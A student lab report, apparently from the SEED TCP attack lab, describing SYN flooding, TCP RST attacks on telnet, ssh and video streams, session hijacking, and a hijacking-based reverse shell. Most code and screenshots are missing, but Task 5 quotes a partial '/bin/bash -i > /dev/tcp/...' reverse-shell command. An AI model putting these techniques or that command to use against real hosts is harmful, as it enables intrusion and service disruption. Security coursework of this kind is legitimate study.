TCP Attack - assignmetns PDF

Title TCP Attack - assignmetns
Author sami master
Course Computer Programming I
Institution University of Cincinnati
Pages 13
File Size 1.2 MB
File Type PDF
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Name: Mohammad Al-shatrat SEED-IP (

Server-IP (

Attacker -IP (

Task 1: SYN Flooding Attack: A) SYN cookies measure Disabled

First we turn off the SYN cookies measure as following in the Server

The the attacker tring to attack on port23 as follow

After that we check the server and we can see that the attack half open exist and the syn packets changed to state SYN_RECV

To make sure that our attack worked, we try to make telnet from seed to the server and the Seed(Client ) can not connect to the server using telnet

B) SYN cookies measure Enabled:

Here we enabled the cookies measure by set its value to 1

And then the attacker tries again his attack, but this time counter measure is active. If the system detect that the number of half-connection is many, it understood that there is a potential SYN Attack so it allocate the resources after receiving the ACK packet

To make sure that our attack did NOT work, we try to make telnet from seed to the server. the Seed(Client ) can connect to the server using telnet immediatley

Task 2: TCP RST Attacks on telnet and ssh Connections: Telnet (Scapy)

Let assume that there is a TCP connection between SEED and server as the follow, the attacker job is to disconnect the TCP connection

The attacker wants to lunch his attack, but he needs few information like the Sport, and seq number so he starts sniffing. The attacker has all the information he needs to lunch his attack, copy them to his program ( and

lunch his attack

Execute the program

To make sure that our attack work, we check the connection and IP address on the connection terminal, we see a message (connection closed by foreign host ) and the IP address is the seed IP(

Telnet (SSH): Let assume that there is a TCP connection between SEED and server as the follow, the attacker job is to disconnect the TCP connection

The attacker wants to lunch his attack, but he needs few information like the Sport, and seq number so he starts sniffing. The attacker has all the information

he needs(sport, seq and the dport = 22) to lunch his attack, copy them to his program ( and lunch his attack

To make sure that our attack work, we check the connection and it’s like follow

Task 3: TCP RST Attacks on Video Streaming Applications:

Let’s assume that there is a TCP connection between the Client(SEED) and YouTube

The attacker want to disconnect this connection using the following command, this command filter host “” which is the client. As the RST packets being sent for each TCP packet; the connection will break out and cause the video too


Task 4: TCP Session Hijacking: Let’s assume that there is a connection between Seed and Server. The attacker job is to hijack the TCP connection by inserting data into this connection

The attacker using Wire-shark sniffed the LAN and gain the information he needs to complete his attack such as (sport, seq, ack,) he also inserted Data with the connection in my case I name it (myonefile.txt)

The attacker then run his program( and I noticed that seed VM stuck after the running the program. To make sure that my attack worked I went to the Server and I typed (ls /tmp/myonefile.txt) and the dot file has been inserted and the connection stopped.

Task 5: Creating Reverse Shell using TCP Session Hijacking: In this attack let us assume that the client and the server has a TCP connection and the attacker job is to hijack the connection and gain a reverse shell, same as the task4 the attacker wants to inject data to redirect the TCP connection to the attacker machine. In the following screenshot is the connection that the attacker wants to gain

The attacker uses wire-shark to sniff the information he want(sport, seq, ack), as the following screenshot

So he make his program ( to gain the connection or the reverse shell as following screenshot. the data include with the code ("/bin/bash -I > /dev/tcp/ 2>&1 0...

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